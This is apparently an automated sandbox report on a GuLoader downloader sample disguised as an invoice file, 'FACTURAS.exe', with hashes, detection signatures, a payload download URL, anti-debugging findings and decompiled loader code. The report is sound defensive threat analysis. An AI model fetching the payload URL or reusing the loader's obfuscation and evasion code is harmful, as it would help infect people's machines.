Play interactive tour

Edit tour

Windows Analysis Report FACTURAS.exe

Overview

General Information

Sample Name:	FACTURAS.exe
Analysis ID:	531838
MD5:	ab82f374210a08b2221d5e1807400a32
SHA1:	6a56b81549185015743deaa196996f73787c5c7d
SHA256:	ab41887e471ac822f1240bf554098fa042910f1c7ac2f9e390081829515bc2fa
Tags:	exesigned
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Potential malicious icon found

Multi AV Scanner detection for submitted file

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

PE / OLE file has an invalid certificate

Sample file is different than original file name gathered from version info

PE file contains strange resources

Contains functionality to read the PEB

Uses code obfuscation techniques (call, push, ret)

Contains functionality for execution timing, often used to detect debuggers

Abnormal high CPU Usage

Detected potential crypto function

Classification

Process Tree

System is w10x64

FACTURAS.exe (PID: 6088 cmdline: "C:\Users\user\Desktop\FACTURAS.exe" MD5: AB82F374210A08B2221D5E1807400A32)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=11UpsPasq_HHoJ"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.822667479.0000000002A80000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000000.00000002.822667479.0000000002A80000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=11UpsPasq_HHoJ"}

Multi AV Scanner detection for submitted file

Show sources

Source: FACTURAS.exe

ReversingLabs: Detection: 13%

Source: FACTURAS.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://drive.google.com/uc?export=download&id=11UpsPasq_HHoJ

Source: FACTURAS.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: FACTURAS.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: FACTURAS.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: FACTURAS.exe	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: FACTURAS.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: FACTURAS.exe	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: FACTURAS.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: FACTURAS.exe	String found in binary or memory: http://ocsp.digicert.com0O
Source: FACTURAS.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: FACTURAS.exe	String found in binary or memory: https://www.digicert.com/CPS0

System Summary:

Potential malicious icon found

Show sources

Source: initial sample

Icon embedded in PE file: bad icon match: 20047c7c70f0e004

Source: FACTURAS.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: FACTURAS.exe

Static PE information: invalid certificate

Source: FACTURAS.exe, 00000000.00000000.290801203.0000000000424000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamefilterhjdens.exe vs FACTURAS.exe
Source: FACTURAS.exe, 00000000.00000002.820596620.0000000002800000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamefilterhjdens.exeFE2XK vs FACTURAS.exe
Source: FACTURAS.exe	Binary or memory string: OriginalFilenamefilterhjdens.exe vs FACTURAS.exe

Source: FACTURAS.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\FACTURAS.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_00403540		0_2_00403540
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_02A8CC26		0_2_02A8CC26

Source: FACTURAS.exe

ReversingLabs: Detection: 13%

Source: FACTURAS.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\FACTURAS.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\FACTURAS.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: classification engine

Classification label: mal76.rans.troj.winEXE@1/0@0/0

Source: C:\Users\user\Desktop\FACTURAS.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\FACTURAS.exe

File created: C:\Users\user\AppData\Roaming\XvFu5flZcgudIlwvVLtjOx372

Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000000.00000002.822667479.0000000002A80000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0040A86B push ebx; retf	0_2_0040A86D
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0040A00A push EDF1CA21h; ret	0_2_0040A010
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_00409212 push ecx; retf	0_2_0040922A
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_00404AC6 push ebp; ret	0_2_00404AC7
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_00404AD5 push cs; iretd	0_2_00404AD8
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0040A2B2 push ss; retf	0_2_0040A2B4
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_00406DF9 push edi; iretd	0_2_00406DFA
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_02A871D6 push eax; ret	0_2_02A871D5
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_02A87176 push eax; ret	0_2_02A871D5
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_02A81A64 push eax; retf	0_2_02A81A71

Source: C:\Users\user\Desktop\FACTURAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\FACTURAS.exe

Code function: 0_2_02A8D105 rdtsc

0_2_02A8D105

Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_02A930FB mov eax, dword ptr fs:[00000030h]	0_2_02A930FB
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_02A92703 mov eax, dword ptr fs:[00000030h]	0_2_02A92703
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_02A8C5E2 mov eax, dword ptr fs:[00000030h]	0_2_02A8C5E2

Source: C:\Users\user\Desktop\FACTURAS.exe

Code function: 0_2_02A8D105 rdtsc

0_2_02A8D105

Source: FACTURAS.exe, 00000000.00000002.816581992.0000000000C30000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: FACTURAS.exe, 00000000.00000002.816581992.0000000000C30000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: FACTURAS.exe, 00000000.00000002.816581992.0000000000C30000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: FACTURAS.exe, 00000000.00000002.816581992.0000000000C30000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection1	Masquerading1	OS Credential Dumping	Security Software Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection1	LSASS Memory	Process Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	System Information Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
FACTURAS.exe	13%	ReversingLabs	Win32.Downloader.GuLoader

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.2.FACTURAS.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1140082		Download File
0.0.FACTURAS.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1140082		Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	531838
Start date:	01.12.2021
Start time:	13:16:12
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	FACTURAS.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.rans.troj.winEXE@1/0@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 8.3% (good quality ratio 4.8%) Quality average: 37.4% Quality standard deviation: 34.9%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115 Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.1786714462714025
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	FACTURAS.exe
File size:	152720
MD5:	ab82f374210a08b2221d5e1807400a32
SHA1:	6a56b81549185015743deaa196996f73787c5c7d
SHA256:	ab41887e471ac822f1240bf554098fa042910f1c7ac2f9e390081829515bc2fa
SHA512:	8844aca394f38a59a63b1984a00b16861a0f7e0fdc04ba20aba264da79fc6e54eeb73c6814f0745ab37ba12ba306e6371561e64f23deac22ba555d75aa3b2019
SSDEEP:	1536:gZEG7DecysKvlp4erYY77BLm321zb2aKQhbHdEs5obasAJepPNp8:6EG7Dpy9nYYn2EzBKYpdOSoNp8
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................D.......=.......Rich............PE..L.....4U.....................0............... ....@................

File Icon


Icon Hash:	20047c7c70f0e004

Static PE Info

General
Entrypoint:	0x401888
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x5534C2F5 [Mon Apr 20 09:12:21 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b209c8634733456633136bfedc71877a

Authenticode Signature

Signature Valid:	false
Signature Issuer:	E=parteringens@Shiremen3.slu, CN=SELSKABSLOKALET, OU=Interimskvitteringerne, O=JUSTITSEN, L=Rutiners, S=honkytonks, C=ML
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	12/1/2021 2:36:44 AM 12/1/2022 2:36:44 AM
Subject Chain	E=parteringens@Shiremen3.slu, CN=SELSKABSLOKALET, OU=Interimskvitteringerne, O=JUSTITSEN, L=Rutiners, S=honkytonks, C=ML
Version:	3
Thumbprint MD5:	CDDFD4747563B21AE94964F7C6F9EB7A
Thumbprint SHA-1:	1CFBE705D5055A36D357E2EF5F5FE20BC6959CA9
Thumbprint SHA-256:	176B1E7918EE21C3FEADE8CC2C9D049B7DFDE73ECFE288C07CF37C692D0011A0
Serial:	00

Entrypoint Preview

Instruction
push 004019BCh
call 00007F85EC75A0A5h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
cmp byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [edx-58h], ah
wait
dec esp
push ss
das
dec ebx
test dword ptr [esi+10DDAE1Bh], esi
inc edi
scasb
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
imul ebp, dword ptr [esi+6Fh], 0065696Ch
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
add byte ptr [esi], bl
mov dword ptr [A74FB7F8h], eax
pushfd
dec ebp
test al, DFh
pop edx
mov dword ptr [ecx-242943C3h], eax
fcomip st(0), st(2)

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x215d4	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x24000	0x970	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x24000	0x1490
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x234	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x20cc4	0x21000	False	0.367520419034	data	5.25414504645	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x22000	0x122c	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x24000	0x970	0x1000	False	0.173828125	data	2.0476168209	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x24840	0x130	data
RT_ICON	0x24558	0x2e8	data
RT_ICON	0x24430	0x128	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x24400	0x30	data
RT_VERSION	0x24150	0x2b0	data	Chinese	Taiwan

Imports

DLL

Import

MSVBVM60.DLL

__vbaR8FixI4, _CIcos, _adj_fptan, __vbaHresultCheck, __vbaVarMove, __vbaStrI4, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, __vbaVarIdiv, _adj_fdiv_m64, _adj_fprem1, __vbaStrCat, __vbaHresultCheckObj, __vbaLenBstrB, __vbaLenVar, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFPFix, __vbaVarTstLt, __vbaFpR8, _CIsin, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaStrCmp, __vbaGet3, __vbaAryConstruct2, __vbaVarTstEq, __vbaObjVar, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, __vbaVarCat, _CIlog, __vbaFileOpen, __vbaNew2, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaInStrB, __vbaVarDup, __vbaVarTstGe, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, __vbaR8IntI4, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

Version Infos

Description	Data
Translation	0x0404 0x04b0
LegalCopyright	Union
InternalName	filterhjdens
FileVersion	4.00
CompanyName	Union
LegalTrademarks	Union
ProductName	Union
ProductVersion	4.00
FileDescription	Union
OriginalFilename	filterhjdens.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	Taiwan

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: FACTURAS.exe PID: 6088 Parent PID: 3324

General

Start time:	13:17:09
Start date:	01/12/2021
Path:	C:\Users\user\Desktop\FACTURAS.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FACTURAS.exe"
Imagebase:	0x400000
File size:	152720 bytes
MD5 hash:	AB82F374210A08B2221D5E1807400A32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.822667479.0000000002A80000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: FACTURAS.exe PID: 6088 Parent PID: 3324 FACTURAS.exeCOMMON

Executed Functions

Function 00403540, Relevance: 1.6, APIs: 1, Instructions: 367memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0BA0867C,-9ADFD688,-00000001D10E6538), ref: 0040388A

Memory Dump Source

Source File: 00000000.00000002.816436718.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.816432009.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.816461471.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.816466735.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b2fff52c35f55826a747af9553781bdc6a20c40d9e410b2cd1b23bea76177296
Instruction ID: dcb234ffe1badf31ed07c6e26d8634e1f6a6ece39ec117f6548178b5362ed6b8
Opcode Fuzzy Hash: b2fff52c35f55826a747af9553781bdc6a20c40d9e410b2cd1b23bea76177296
Instruction Fuzzy Hash: 26E1D57144E2C55FD7834F34C8B539ABFB4EF43699F9914CAE8C24A193D26845C8CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0041C3E4, Relevance: 375.8, APIs: 174, Strings: 40, Instructions: 1267
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0041C3E4(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v40;
				signed int _v44;
				void* _v48;
				short _v52;
				short* _v64;
				char _v76;
				short _v84;
				void* _v88;
				short _v92;
				void* _v96;
				intOrPtr _v100;
				short _v104;
				void* _v108;
				void* _v112;
				char _v128;
				short _v132;
				intOrPtr _v136;
				void* _v140;
				char _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				char _v168;
				long long _v176;
				char _v184;
				intOrPtr _v192;
				char _v200;
				intOrPtr _v208;
				char _v216;
				intOrPtr _v224;
				char _v232;
				long long _v240;
				char _v248;
				char _v264;
				char* _v272;
				char _v280;
				char _v332;
				signed int _v336;
				signed int _v340;
				void* _v344;
				signed int _v348;
				char _v352;
				char _v356;
				char _v360;
				char _v364;
				long long _v368;
				long long _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				intOrPtr* _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				char* _t658;
				signed short _t659;
				signed int _t671;
				char* _t675;
				short _t676;
				short _t685;
				short _t695;
				signed int _t704;
				signed int _t707;
				signed int _t708;
				signed int _t712;
				char* _t713;
				signed int _t720;
				signed int _t722;
				signed int _t723;
				signed int _t731;
				signed int _t732;
				signed int _t737;
				signed int _t738;
				signed int _t741;
				signed int _t743;
				signed int _t745;
				char* _t747;
				signed int _t761;
				signed int* _t762;
				signed int _t771;
				char* _t772;
				char* _t776;
				signed int _t780;
				signed int _t797;
				signed int _t802;
				char* _t808;
				char* _t819;
				signed int _t822;
				signed int _t827;
				signed int* _t832;
				signed int _t836;
				signed char _t842;
				signed int _t845;
				char* _t848;
				signed int _t849;
				char* _t853;
				char* _t854;
				signed int _t857;
				signed int _t865;
				char* _t874;
				signed int* _t879;
				short _t882;
				signed int _t883;
				signed int _t885;
				signed int _t887;
				signed int _t889;
				char* _t891;
				short _t892;
				signed int _t897;
				signed int _t899;
				signed int _t901;
				short _t903;
				signed int _t904;
				signed int _t906;
				signed int _t908;
				signed int _t909;
				signed int _t910;
				signed int _t912;
				signed int _t914;
				signed int _t915;
				signed int _t921;
				signed int _t926;
				char* _t932;
				signed int _t989;
				signed int _t999;
				signed int _t1004;
				signed int _t1010;
				signed int _t1015;
				void* _t1065;
				void* _t1067;
				intOrPtr _t1068;
				void* _t1069;
				void* _t1070;
				void* _t1082;
				long long _t1086;

				_t1068 = _t1067 - 0xc;
				 *[fs:0x0] = _t1068;
				L00401540();
				_v16 = _t1068;
				_v12 = 0x401260;
				_v8 = _a4 & 0x00000001;
				_a4 = _a4 & 0xfffffffe;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401546, _t1065);
				_push(2);
				_push(0x4029bc);
				_push( &_v76);
				L0040186A();
				_v272 = L"Hjortens";
				_v280 = 8;
				L0040184C();
				_push( &_v184);
				_push( &_v200);
				L00401852();
				_push( &_v200);
				_t658 =  &_v144;
				_push(_t658);
				L00401858();
				_push(_t658);
				L0040185E();
				_v208 = _t658;
				_v216 = 8;
				_t659 =  &_v216;
				_push(_t659);
				L00401864();
				asm("sbb eax, eax");
				_v380 =  ~( ~_t659 + 1);
				_t932 =  &_v144;
				L00401846();
				_push( &_v216);
				_push( &_v200);
				_push( &_v184);
				_push(3);
				L00401840();
				_t1069 = _t1068 + 0x10;
				if(_v380 != 0) {
					_push(L"7:7:7");
					__eax =  &_v184;
					_push( &_v184); // executed
					L0040182E(); // executed
					__eax =  &_v184;
					_push( &_v184);
					L00401834();
					L0040183A();
					L00401828();
					_v272 = L"Readjust";
					_v280 = 8;
					L0040184C();
					__eax =  &_v184;
					_push( &_v184);
					__eax =  &_v200;
					_push( &_v200);
					L0040181C();
					__eax =  &_v200;
					_push( &_v200);
					__eax =  &_v144;
					L00401858();
					_push(L"CANNIBALEAN");
					_push(L"Bursati");
					_push(L"multivalent"); // executed
					L00401822(); // executed
					L00401846();
					__eax =  &_v200;
					_push( &_v200);
					__eax =  &_v184;
					_push( &_v184);
					_push(2);
					L00401840();
					__esp = __esp + 0xc;
				}
				_push( &_v184);
				L0040180A();
				_push( &_v184);
				_t1082 =  *0x401258;
				_push(_t932);
				_push(_t932);
				_v92 = _t1082;
				_push(0x40250c);
				_push( &_v200);
				L00401810();
				_v272 = 0xfffffff9;
				_v280 = 0x8002;
				_push( &_v200);
				_t671 =  &_v280;
				_push(_t671);
				L00401816();
				_v380 = _t671;
				_push( &_v200);
				_push( &_v184);
				_push(2);
				L00401840();
				_t1070 = _t1069 + 0xc;
				if(_v380 != 0) {
					_v176 = 1;
					_v184 = 2;
					_push(0);
					_push( &_v184);
					L00401804();
					L0040183A();
					L00401828();
					_push( &_v184);
					L004017FE();
					_push( &_v184);
					L00401834();
					L0040183A();
					L00401828();
				}
				_v272 = L"replicr";
				_v280 = 8;
				L0040184C();
				_t675 =  &_v184;
				_push(_t675);
				L004017F8();
				_v380 =  ~(0 | _t675 - 0x0000ffff <= 0x00000000);
				L00401828();
				_t676 = _v380;
				if(_t676 != 0) {
					 *_v64 = 0x579;
					 *((short*)(_v64 + 2)) = 0x23c6;
					_v176 = 0x80020004;
					_v184 = 0xa;
					_t882 =  &_v184;
					_push(_t882);
					L004017F2();
					_t989 = 2;
					 *((short*)(_v64 + (_t989 << 1))) = _t882;
					L00401828();
					_t883 = 2;
					 *((short*)(_v64 + _t883 * 3)) = 0x3c46;
					_t885 = 2;
					 *((short*)(_v64 + (_t885 << 2))) = 0x2b65;
					_t887 = 2;
					 *((short*)(_v64 + _t887 * 5)) = 0x4c1;
					_t889 = 2;
					 *((short*)(_v64 + _t889 * 6)) = 0x1d9a;
					_v272 = 0x402528;
					_v280 = 8;
					L0040184C();
					_t891 =  &_v184;
					_push(_t891);
					_push(0x10);
					L004017DA();
					L0040183A();
					_push(_t891);
					L004017E0();
					_v192 = _t891;
					_v200 = 3;
					_t892 =  &_v200;
					_push(_t892);
					L004017E6();
					L0040183A();
					_push(_t892);
					L004017EC();
					_t999 = 2;
					 *((short*)(_v64 + _t999 * 7)) = _t892;
					_push( &_v148);
					_push( &_v144);
					_push(2);
					L004017D4();
					_push( &_v200);
					_push( &_v184);
					_push(2);
					L00401840();
					_t1070 = _t1070 + 0x18;
					_t897 = 2;
					 *((short*)(_v64 + (_t897 << 3))) = 0xfe2;
					_t899 = 2;
					 *((short*)(_v64 + _t899 * 9)) = 0x2b08;
					_t901 = 2;
					 *((short*)(_v64 + _t901 * 0xa)) = 0x5426;
					_v176 = 0x80020004;
					_v184 = 0xa;
					_t903 =  &_v184;
					_push(_t903);
					L004017F2();
					_t1004 = 2;
					 *((short*)(_v64 + _t1004 * 0xb)) = _t903;
					L00401828();
					_t904 = 2;
					 *((short*)(_v64 + _t904 * 0xc)) = 0x368d;
					_t906 = 2;
					 *((short*)(_v64 + _t906 * 0xd)) = 0x142;
					_t908 = 2;
					_t909 = _t908 * 0xe;
					 *((short*)(_v64 + _t909)) = 0x34bb;
					_push(L"OFFENTLIGHEDSSFRE");
					L004017EC();
					_t1010 = 2;
					 *(_v64 + _t1010 * 0xf) = _t909;
					_t910 = 2;
					 *((short*)(_v64 + (_t910 << 4))) = 0x45bc;
					_t912 = 2;
					 *((short*)(_v64 + _t912 * 0x11)) = 0x530e;
					_t914 = 2;
					_t915 = _t914 * 0x12;
					 *((short*)(_v64 + _t915)) = 0x6a6e;
					_push(L"Dagvagten");
					L004017EC();
					_t1015 = 2;
					 *(_v64 + _t1015 * 0x13) = _t915;
